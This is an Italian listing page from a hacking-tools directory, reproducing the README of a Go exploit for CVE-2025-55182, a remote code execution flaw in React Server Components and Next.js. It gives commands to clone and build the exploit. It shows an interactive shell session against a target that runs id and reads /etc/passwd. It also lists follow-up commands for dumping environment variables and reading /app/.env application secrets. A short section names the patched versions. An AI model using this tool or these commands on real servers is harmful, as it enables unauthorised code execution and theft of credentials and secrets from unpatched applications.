Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182 — Strumento di sfruttamento RCE che prende di mira CVE-2025-55182, una vulnerabilità critica in React Server Components (RSC) che colpisce React 19.0.0 - 19.2.0 e le applicazioni Next.js. | Kitploit
Strumenti/GitHubGitHub/yyax13/cve-2025-55182
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlRed TeamingSviluppo Payload
GitHubyyax13/cve-2025-55182

CVE-2025-55182

Strumento di sfruttamento RCE che prende di mira CVE-2025-55182, una vulnerabilità critica in React Server Components (RSC) che colpisce React 19.0.0 - 19.2.0 e le applicazioni Next.js.

Vedi Repository
18 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

👻 Exploit Go per CVE-2025-55182

Strumento interattivo per l'exploit RCE di CVE-2025-55182 (React Server Components)

GitHub Stars License Go

🎯 Cos'è?

CVE-2025-55182 è uno strumento minimale e interattivo per l'exploit RCE che prende di mira CVE-2025-55182, una vulnerabilità critica nei React Server Components (RSC) che colpisce React 19.0.0 - 19.2.0 e le applicazioni Next.js.


📦 Installazione

Prerequisiti

  • Go 1.18 o superiore
  • Un target vulnerabile che esegue React 19.0.0 - 19.2.0

Compilazione dal sorgente

root@kitploit:~
git clone https://github.com/Hghost0x00/CVE-2025-55182.git
cd CVE-2025-55182
go build -o CVE-2025-55182 main.go

🚀 Utilizzo

Utilizzo base

root@kitploit:~
./CVE-2025-55182

Sessione interattiva

root@kitploit:~
_____________   _______________         _______________   ________   .________          .________.____________  ______  ________  
╲_   ___ ╲   ╲ ╱   ╱╲_   _____╱         ╲_____  ╲   _  ╲  ╲_____  ╲  │   ____╱          │   ____╱│   ____╱_   │╱  __  ╲ ╲_____  ╲ 
╱    ╲  ╲╱╲   Y   ╱  │    __)_   ______  ╱  ____╱  ╱_╲  ╲  ╱  ____╱  │____  ╲   ______  │____  ╲ │____  ╲ │   │>      <  ╱  ____╱ 
╲     ╲____╲     ╱   │        ╲ ╱_____╱ ╱       ╲  ╲_╱   ╲╱       ╲  ╱       ╲ ╱_____╱  ╱       ╲╱       ╲│   ╱   ──   ╲╱       ╲ 
 ╲______  ╱ ╲___╱   ╱_______  ╱         ╲_______ ╲_____  ╱╲_______ ╲╱______  ╱         ╱______  ╱______  ╱│___╲______  ╱╲_______ ╲
        ╲╱                  ╲╱                  ╲╱     ╲╱         ╲╱       ╲╱                 ╲╱       ╲╱            ╲╱         ╲╱  

    React2Shell RCE | CVE-2025-55182
    @hghost010

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[?] Target: localhost:3000
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] VULNERABLE
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

ghost@rce $ id
uid=1000(node) gid=1000(node) groups=1000(node)

ghost@rce $ whoami
node

ghost@rce $ pwd
/app

ghost@rce $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
node:x:1000:1000::/home/node:/bin/bash

ghost@rce $ exit

🎥 Demo

https://github.com/user-attachments/assets/9cfdc436-9217-4921-bdbd-1368378f049f


Versioni vulnerabili:

  • React 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • Applicazioni Next.js che utilizzano queste versioni di React

Versioni corrette:

  • React 19.2.1+
  • Next.js con dipendenza React aggiornata

🧪 Configurazione del laboratorio di test

Vuoi testarlo in sicurezza? Configura un ambiente di laboratorio vulnerabile:

root@kitploit:~
# Clone vulnerable Next.js app
git clone https://github.com/zack0x01/vuln-app-CVE-2025-55182.git
cd vuln-app-CVE-2025-55182

# Install and run
npm install --legacy-peer-deps
npm run dev

# In another terminal, run ghost-scanner
./CVE-2025-55182
# Enter: localhost:3000

📚 Comandi comuni

root@kitploit:~
ghost@rce $ id                    # Check user privileges
ghost@rce $ whoami                # Current username
ghost@rce $ pwd                   # Current directory
ghost@rce $ ls -la                # List files
ghost@rce $ cat /etc/passwd       # Read files
ghost@rce $ uname -a              # System information
ghost@rce $ env                   # Environment variables
ghost@rce $ ps aux                # Running processes
ghost@rce $ netstat -tulpn        # Network connections
ghost@rce $ cat /app/.env         # Application secrets

📊 Statistiche del repository

GitHub repo size GitHub last commit GitHub issues


🔗 Riferimenti

  • Dettagli di CVE-2025-55182
  • Avviso di sicurezza di React
  • Avviso di sicurezza di Next.js
  • PoC originale di maple3142
  • Ricerca di Assetnote
  • App di test vulnerabile

💬 Community e supporto

  • 🐦 Twitter/X: @hghost010
  • 🐙 GitHub: Hghost0x00

Hai trovato un bug? Apri una issue


⭐ Mostra il tuo supporto

Se questo strumento ti è stato utile:

  • ⭐ Metti una stella a questo repository
  • 💬 Condividilo con altri

📝 Licenza

Questo progetto è concesso in licenza MIT - consulta il file LICENSE per i dettagli.


Fatto con 👻 da Hghost0x00
Buon hacking ⚡

Scarica lo strumento